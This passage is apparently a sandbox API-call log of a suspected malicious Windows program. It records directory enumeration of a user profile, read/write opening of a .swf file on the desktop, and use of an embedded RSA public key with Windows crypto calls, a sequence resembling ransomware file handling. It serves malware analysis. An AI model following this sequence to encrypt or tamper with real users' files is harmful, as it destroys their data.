out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0234.869] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0234.871] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0234.871] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0234.871] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0234.871] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0234.871] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0234.871] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0234.872] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0234.872] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0234.872] PathFindFileNameW (pszPath="") returned="" [0234.872] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0234.874] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.874] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0234.874] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0234.874] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0234.874] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0234.874] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0234.874] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\") returned="iIWj9EjHStmpO_L\\" [0234.875] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\") returned="wzVrnoY3pfgm5\\" [0234.875] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0234.875] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0234.875] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0234.875] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0234.875] PathFindFileNameW (pszPath="") returned="" [0234.875] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99dcb980, ftCreationTime.dwHighDateTime=0x1d5d7f0, ftLastAccessTime.dwLowDateTime=0x8fa5ec40, ftLastAccessTime.dwHighDateTime=0x1d5db9a, ftLastWriteTime.dwLowDateTime=0x8fa5ec40, ftLastWriteTime.dwHighDateTime=0x1d5db9a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0234.880] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99dcb980, ftCreationTime.dwHighDateTime=0x1d5d7f0, ftLastAccessTime.dwLowDateTime=0x8fa5ec40, ftLastAccessTime.dwHighDateTime=0x1d5db9a, ftLastWriteTime.dwLowDateTime=0x8fa5ec40, ftLastWriteTime.dwHighDateTime=0x1d5db9a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.880] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4ec9e00, ftCreationTime.dwHighDateTime=0x1d5dd95, ftLastAccessTime.dwLowDateTime=0xcae145a0, ftLastAccessTime.dwHighDateTime=0x1d5e826, ftLastWriteTime.dwLowDateTime=0xcae145a0, ftLastWriteTime.dwHighDateTime=0x1d5e826, nFileSizeHigh=0x0, nFileSizeLow=0xef8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kIgwk9vBXkfQWoRq4O4.swf", cAlternateFileName="KIGWK9~1.SWF")) returned 1 [0234.880] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\kIgwk9vBXkfQWoRq4O4.swf") returned=".swf" [0234.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\kIgwk9vBXkfQWoRq4O4.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\kigwk9vbxkfqworq4o4.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.881] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=61325) returned 1 [0234.881] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.884] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xef67, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.884] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.886] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xef8d, lpOverlapped=0x0) returned 1 [0234.887] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.887] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.887] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.887] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694ec0) returned 1 [0234.888] CryptCreateHash (in: hProv=0x694ec0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.888] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.889] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.889] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.889] GetLastError () returned 0x0 [0234.889] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.889] CryptReleaseContext (hProv=0x694ec0, dwFlags=0x0) returned 1 [0234.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0234.889] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.889] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.889] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.890] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee940 | out: hHeap=0x630000) returned 1 [0234.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee958 | out: hHeap=0x630000) returned 1 [0234.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0234.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9a0 [0234.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee958 [0234.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee940 [0234.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0234.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0234.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee958 | out: hHeap=0x630000) returned 1 [0234.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee940 | out: hHeap=0x630000) returned 1 [0234.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0234.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.891] GetCurrentThreadId () returned 0x314 [0234.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0234.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3be0 [0234.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694ec0 [0234.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.892] GetCurrentThreadId () returned 0x314 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9a0 [0234.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee940 [0234.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee958 [0234.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee928 [0234.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9b8 [0234.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee988 [0234.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee970 [0234.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee9d0 [0234.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee970 [0234.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0234.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee940 | out: hHeap=0x630000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee940 [0234.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0234.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9d0 | out: hHeap=0x630000) returned 1 [0234.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0234.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee940 | out: hHeap=0x630000) returned 1 [0234.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0234.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694ec0 | out: hHeap=0x630000) returned 1 [0234.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9b8 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee958 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee928 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee910 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: 